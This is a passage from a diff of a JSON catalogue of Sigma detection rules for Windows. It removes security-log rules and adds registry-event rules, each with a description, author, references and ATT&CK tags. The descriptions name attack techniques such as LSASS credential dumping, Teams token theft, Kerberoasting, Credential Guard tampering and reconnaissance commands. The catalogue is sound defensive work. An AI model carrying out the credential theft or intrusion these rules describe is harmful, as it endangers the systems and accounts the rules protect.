"oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrators that use the RunAS command or scheduled tasks" - ], - "filename": "win_security_susp_logon_explicit_credentials.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" - ], - "tags": [ - "attack.t1078", - "attack.lateral_movement" - ] - }, - "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "value": "Suspicious Remote Logon with Explicit Credentials" - }, - { - "description": "Detects logon events that specify new credentials", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/06", - "falsepositive": [ - "Legitimate remote administration activity" - ], - "filename": "win_security_susp_logon_newcredentials.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" - ], - "tags": "No established tags" - }, - "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", - "value": "Outgoing Logon with New Credentials" - }, - { - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "meta": { - "author": "sigma", - "creation_date": "2017/02/12", + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_lsass_dump.yml", + "filename": "registry_event_narrator_feedback_persistance.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/jackcr/status/807385668833968128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.001" ] }, - "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "value": "Password Dumper Activity on LSASS" + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence" }, { - "description": "Detects process handle on LSASS process with certain access mask", + "description": "Detects the presence of a registry key created during Azorult execution", "meta": { - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" - ], - "filename": "win_security_susp_lsass_dump_generic.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" - ], - "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" - ] - }, - "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "value": "Generic Password Dumper Activity on LSASS" - }, - { - "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", - "meta": { - "author": "Vasiliy Burov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Software uninstallation", - "Files restore activities" - ], - "filename": 
"win_security_susp_multiple_files_renamed_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", - "value": "Suspicious Multiple File Rename Or Delete Occurred" - }, - { - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "meta": { - "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "creation_date": "2017/03/07", - "falsepositive": [ - "Administrator activity" - ], - "filename": "win_security_susp_net_recon_activity.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ] - }, - "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "value": "Reconnaissance Activity" - }, - { - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" - ], - "tags": "No established tags" - }, - "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", - "value": "Password Protected ZIP File Opened" - }, - { - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" - ], - "tags": "No established tags" - }, - "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", - "value": "Password Protected ZIP File Opened (Suspicious Filenames)" - }, - { - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" - ], - "tags": "No established tags" - }, - "uuid": "571498c8-908e-40b4-910b-d2369159a3da", - "value": "Password Protected ZIP File Opened (Email Attachment)" - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Other browsers" - ], - "filename": "win_security_susp_outbound_kerberos_connection.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1558.003" - ] - }, - "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "value": "Suspicious Outbound Kerberos Connection - Security" - }, - { - "description": "Detects possible addition of shadow credentials to an active directory object.", - "meta": { - "author": "Nasreddine Bencherchali (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service 
account. These accounts can be added as Exceptions. (From elastic FP section)" - ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556" - ] - }, - "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", - "value": "Possible Shadow Credentials Added" - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", + "author": "Trent Liffick", + "creation_date": "2020/05/08", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_psexec.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_mal_azorult.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "value": "Suspicious PsExec Execution" - }, - { - "description": "Detects known sensitive file extensions accessed on a network share", - "meta": { - "author": "Samir Bousseaden", 
- "creation_date": "2019/04/03", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "filename": "win_security_susp_raccess_sensitive_fext.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection", - "attack.t1039" - ] - }, - "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", - "value": "Suspicious Access to Sensitive File Extensions" - }, - { - "description": "Detects service ticket requests using RC4 encryption type", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/06", - "falsepositive": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" - ], - "filename": "win_security_susp_rc4_kerberos.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=3458", - "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", - "value": "Suspicious Kerberos RC4 Ticket Encryption" - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "meta": { - "author": "@SBousseaden, Florian Roth", - "creation_date": "2019/11/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_rottenpotato.yml", - "level": "high", - "logsource.category": "No established category", - 
"logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1195284233729777665", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ] - }, - "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "value": "RottenPotato Like Attack Pattern" - }, - { - "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/06/09", - "falsepositive": "No established falsepositives", - "filename": "win_security_susp_samr_pwset.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", - "value": "Possible Remote Password Change Through SAMR" - }, - { - "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_scheduled_task_creation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" ], "tags": [ "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1112" ] }, - "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "value": "Suspicious Scheduled Task Creation" + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware" }, { - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", "falsepositive": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "filename": "win_security_susp_scheduled_task_delete.yml", + "filename": "registry_event_cmstp_execution_by_registry.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - 
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "value": "Important Scheduled Task Deleted/Disabled" - }, - { - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_scheduled_task_update.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", - "value": "Suspicious Scheduled Task Update" - }, - { - "description": "Detects renaming of file while deletion with SDelete tool.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/14", - "falsepositive": [ - "Legitimate usage of SDelete" - ], - "filename": "win_security_susp_sdelete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" - ] - }, - "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "value": "Secure Deletion with SDelete" - }, - { - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "meta": { - "author": "@neu5ron", - "creation_date": "2019/02/05", - "falsepositive": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" - ], - "filename": "win_security_susp_time_modification.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", - "value": "Unauthorized System Time Modification" - }, - { - "description": "Detection of logins performed with WMI", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/04", - "falsepositive": [ - "Monitoring tools", - "Legitimate system administration" - ], - "filename": "win_security_susp_wmi_login.yml", - "level": "low", - "logsource.category": "No established 
category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" - ], - "tags": [ "attack.execution", - "attack.t1047" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ] }, - "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", - "value": "Login with WMI" + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": "CMSTP Execution Registry Event" }, { - "description": "Detects remote service activity via remote access to the svcctl named pipe", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", "falsepositive": [ - "Unknown" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "filename": "win_security_svcctl_remote_service.yml", + "filename": "registry_event_trust_record_modification.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" ], "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ] }, - "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "value": "Remote Service Activity via SVCCTL Named Pipe" + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows 
Registry Trust Record Modification" }, { - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/13", "falsepositive": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "filename": "win_security_syskey_registry_access.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_susp_atbroker_change.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ - "attack.discovery", - "attack.t1012" + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" ] }, - "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "value": "SysKey Registry Keys Access" + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change" }, { - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to 
manipulate the caching credentials.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/07/14", + "creation_date": "2019/08/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml", + "filename": "registry_event_disable_wdigest_credential_guard.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" ], "tags": [ "attack.defense_evasion", "attack.t1112" ] }, - "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "value": "Sysmon Channel Reference Deletion" + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification" }, { - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "filename": "win_security_tap_driver_installation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", - "value": "Tap Driver Installation - Security" - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "meta": { - "author": "@SerkinValery", - "creation_date": "2022/09/16", + "author": "omkar72", + "creation_date": "2020/10/30", "falsepositive": [ "Unknown" ], - "filename": "win_security_teams_suspicious_objectaccess.yml", + "filename": "registry_event_runkey_winekey.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", - "value": "Suspicious Teams Application Related ObjectAcess Event" - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential 
data) using network shares", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ] - }, - "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", - "value": "Transferring Files with Credential Data via Network Shares" - }, - { - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/14", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_security_user_added_to_local_administrators.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", - "value": "User Added to Local Administrators" - }, - { - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "meta": { - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ] - }, - "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", - "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" - }, - { - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/18", - "falsepositive": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" - ], - "filename": "win_security_user_creation.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" ], "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ] }, - "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "value": "Local User Creation" + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification" }, { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - 
"creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." - ], - "filename": "win_security_user_driver_loaded.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User" - }, - { - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", "falsepositive": [ "Unknown" ], - "filename": "win_security_user_logoff.yml", - "level": "informational", - "logsource.category": "No established category", + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - 